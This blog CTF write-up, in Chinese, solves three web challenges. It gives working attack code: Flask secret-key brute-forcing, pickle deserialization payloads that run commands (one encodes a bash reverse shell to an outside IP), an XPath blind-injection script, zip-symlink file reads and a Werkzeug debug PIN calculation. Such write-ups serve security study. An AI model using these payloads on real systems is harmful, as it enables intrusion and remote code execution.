美团网络安全挑战赛
2022-9-20 08:3:7 Author: 雾晓安全(查看原文) 阅读量:28 收藏

PICKLE

题目源代码如下

import base64
import pickle
from flask import Flask, session
import os
import random

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(2).hex()

@app.route('/')
def hello_world():
    if not session.get('user'):
        session['user'] = ''.join(random.choices("admin", k=5))
    return 'Hello {}!'.format(session['user'])

@app.route('/admin')
def admin():
    if session.get('user') != "admin":
        return f"<script>alert('Access Denied');window.location.href='/'</script>"
    else:
        try:
            a = base64.b64decode(session.get('ser_data')).replace(b"builtin"b"BuIltIn").replace(b"os"b"Os").replace(b"bytes"b"Bytes")
            if b'R' in a or b'i' in a or b'o' in a or b'b' in a:
                raise pickle.UnpicklingError("R i o b is forbidden")
            pickle.loads(base64.b64decode(session.get('ser_data')))
            return "ok"
        except:
            return "error!"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8888)

首先我们如果要反序列化的化,就要伪造session让自己是admin。那么我们首先就需要获取到密钥。这里的密钥是伪随机的。我们生成字典利用工具爆破出密钥即可
numbers_str = [str(x) for x in range(10)]
a=['a','b','c','d','e','f']
a+= numbers_str
file=open("C:/Users/Administrator/Desktop/easypickle/zidian.txt",'w')
for b in a:
    for c in a:
        for d in a:
            for e in a:
                file.write("{}{}{}{}\n".format(b,c,d,e))
然后利用flask-unsign工具直接跑就行了(跑得不是一般的快
flask-unsign --unsign --cookie "eyJ1c2VyIjoiYWRtaW4ifQ.YyVFUA.RSTsbveITHMSD9v0MTLMswCryRc" --wordlist "C:\Users\Administrator\Desktop\easypickle\zidian.txt" --no-literal-eval
[*] Session decodes to: {'user': 'admin'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 24960 attempts
b'6174'
黑名单这里的逻辑是把我们的序列化的数据解码后正则,再替换,只要替换后的payload过了waf就可以了。最后反序列化的是替换前的。那么这里其实是可以用o指令,只是也要把s指令带上,那么替换之后就变成了Os然后是可以过waf的,最后反序列化的是os.
s的指令如下。那么我们只需要把s指令和o指令合理结合即可
本地测试一下
import pickle
import base64
import os
code=b'''(S'shanghe'\nS'shanghe'\nd(S'shanghe'\nS'shanghe'\nd(cos\nsystem\nS'dir'\nos.'''

code=base64.b64encode(code)
print(code)
# pickle.loads(base64.b64decode(code)

大家可以参考一下这篇文章来补一下pickle的指令https://xz.aliyun.com/t/7436#toc-6,然后像文章里面一样利用pickle的工具库来分析payload
C:\Users\Administrator\Desktop\easypickle\venv\Scripts\python.exe C:/Users/Administrator/Desktop/easypickle/3.py 
code=b'''(S'shanghe'\nS'shanghe'\nd(S'shanghe'\nS'shanghe'\nd(cos\nsystem\nS'dir'\nos.'''

    0: (    MARK
    1: S        STRING     'shanghe1'
   12: S        STRING     'shanghe'  #这里的意思是压进去第一个字典
   23: d        DICT       (MARK at 0)
   24: (    MARK
   25: S        STRING     'shanghe2'
   36: S        STRING     'shanghe'
   47: d        DICT       (MARK at 24)  #再往栈里面压进去第二个字典
   48: (    MARK
   49: c        GLOBAL     'os system'
   60: S        STRING     'dir'
   67: o        OBJ        (MARK at 48)  #这里用我们逃出来的o指令进行命令执行
   68: s    SETITEM   #最后s的指令就会把 o指令执行后的内容以及shanghe2的键值对压进去shanghe1的字典里面,作为新的键值对。
   69: .    STOP
highest protocol among opcodes = 1

最后直接拿flag即可。也可以编码用v指令任意命令执行反弹shell都可以
import pickle
import base64
import os
code=b'''(S'shanghe'\nS'shanghe'\ndS'shanghe'\n(cos\nsystem\nS'cat f* >xxx'os.'''
code=base64.b64encode(code)
print(code)
# pickle.loads(base64.b64decode(code))
然后伪造即可替换原来的sesison,然后访问admin页面即可

python3  flask_session_cookie_manager3.py encode -s "6174"  -t "{'user': 'admin','ser_data':b'KFMnc2hhbmdoZScKUydzaGFuZ2hlJwpkUydzaGFuZ2hlJwooY29zCnN5c3RlbQpWXHUwMDYyXHUwMDYxXHUwMDczXHUwMDY4XHUwMDIwXHUwMDJEXHUwMDYzXHUwMDIwXHUwMDI3XHUwMDczXHUwMDY4XHUwMDIwXHUwMDJEXHUwMDY5XHUwMDIwXHUwMDNFXHUwMDI2XHUwMDIwXHUwMDJGXHUwMDY0XHUwMDY1XHUwMDc2XHUwMDJGXHUwMDc0XHUwMDYzXHUwMDcwXHUwMDJGXHUwMDM0XHUwMDM3XHUwMDJFXHUwMDM5XHUwMDM2XHUwMDJFXHUwMDM0XHUwMDMxXHUwMDJFXHUwMDMxXHUwMDMwXHUwMDMzXHUwMDJGXHUwMDMxXHUwMDMzXHUwMDMzXHUwMDM3XHUwMDIwXHUwMDMwXHUwMDNFXHUwMDI2XHUwMDMxXHUwMDI3Cm9zLg=='}

babyjava

参考:https://xz.aliyun.com/t/7791#toc-6
简单测试一下
不难发现盲注
写脚本进行爆破
import requests

url = "http://eci-2zeck6h5lu4htf36m573.cloudeci1.ichunqiu.com:8888/hello"
string="abcdefghjklmnopqrstuvwxyz1234567890{}-_"
def getstr():
    result=""
    for j in range(1,50):
        for i in string:
            #payload=f"-1'or substring(name(/*[1]), {j}, 1)='{i}' or '0'='"       #root
            #payload = f"-1'or substring(name(/root/*[1]), {j}, 1)='{i}' or '0'='" #user
            #payload = f"-1'or substring(name(/root/user/*[1]), {j}, 1)='{i}' or '0'='" #username
            payload = f"-1'or substring((//root[position()=1]/user[position()=1]/username[position()=2]),{j},1)='{i}' or '0'='"
            data = {"xpath":payload }
            r=requests.post(url,data=data)
            if "<p>user1</p>" in r.text:
                result+=i
                print(result)
        print("++++++++++++++++++++++++++++")

getstr()


onlineUnzip

题目源代码如下

import os
import re
from hashlib import md5
from flask import Flask, redirect, request, render_template, url_for, make_response

app=Flask(__name__)

def extractFile(filepath):
    extractdir=filepath.split('.')[0]
    if not os.path.exists(extractdir):
        os.makedirs(extractdir)
    os.system(f'unzip -o {filepath} -d {extractdir}')
    return redirect(url_for('display',extractdir=extractdir))

@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')

@app.route('/display', methods=['GET'])
@app.route('/display/', methods=['GET'])
@app.route('/display/<path:extractdir>', methods=['GET'])
def display(extractdir=''):
    if re.search(r"\.\.", extractdir, re.M | re.I) != None:
        return "Hacker?"
    else:
        if not os.path.exists(extractdir):
            return make_response("error"404)
        else:
            if not os.path.isdir(extractdir):
                f = open(extractdir, 'rb')
                response = make_response(f.read())
                response.headers['Content-Type'] = 'application/octet-stream'
                return response
            else:
                fn = os.listdir(extractdir)
                fn = [".."] + fn
                f = open("templates/template.html")
                x = f.read()
                f.close()
                ret = "<h1>文件列表:</h1><br><hr>"
                for i in fn:
                    tpath = os.path.join('/display', extractdir, i)
                    ret += "<a href='" + tpath + "'>" + i + "</a><br>"
                x = x.replace("HTMLTEXT", ret)
                return x

@app.route('/upload', methods=['GET', 'POST'])
def upload():
    ip = request.remote_addr
    uploadpath = 'uploads/' + md5(ip.encode()).hexdigest()[0:4]

    if not os.path.exists(uploadpath):
        os.makedirs(uploadpath)

    if request.method == 'GET':
        return redirect('/')

    if request.method == 'POST':
        try:
            upFile = request.files['file']
            print(upFile.filename)
            if os.path.splitext(upFile.filename)[-1]=='.zip':
                filepath=f"{uploadpath}/{md5(upFile.filename.encode()).hexdigest()[0:4]}.zip"
                upFile.save(filepath)
                zipDatas = extractFile(filepath)
                return zipDatas
            else:
                return f"{upFile.filename} is not a zip file !"
        except:
            return make_response("error"404)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000, debug=True)

这里直接利用软链接就可以进行任意文件读取了。按照下面的操作来即可
可以看到这里是开启debug的。那么可以算pin来打。
可以参考这个师傅算pin的文章
https://blog.csdn.net/weixin_54648419/article/details/123632203
#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'ctf'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '95532922527',#  /sys/class/net/eth0/address 16进制转10进制
    '96cec10d3d9307792745ec3b85c896209361435ac3de86b68f6b5282b8bc57435c57c9096554c72c7f5a5bc591939427'#  /etc/machine-id  拼接上/proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 543:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

上面算machine_id有点小坑是,算pin的好多文章描述的都是(每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_id,docker靶机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,在非docker环境下读取后两个,非docker环境三个都需要读取),然后这里三个文件都有。最后各种匹配都不行。看了下算machine_id的源码,其实就是把/etc/machine-id和/proc/self/cgroup拼接起来就行了
最后算出pin码136-159-380,进入/console控制台命令执行拿flag即可

往期回顾:


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247495423&idx=1&sn=c9c8c55114798f291b25a666b7438eac&chksm=ce682179f91fa86f098506c92093bb941200d51c6494c95ce6bff9c0557b9c64b78fb33c5f67#rd
如有侵权请联系:admin#unsafe.sh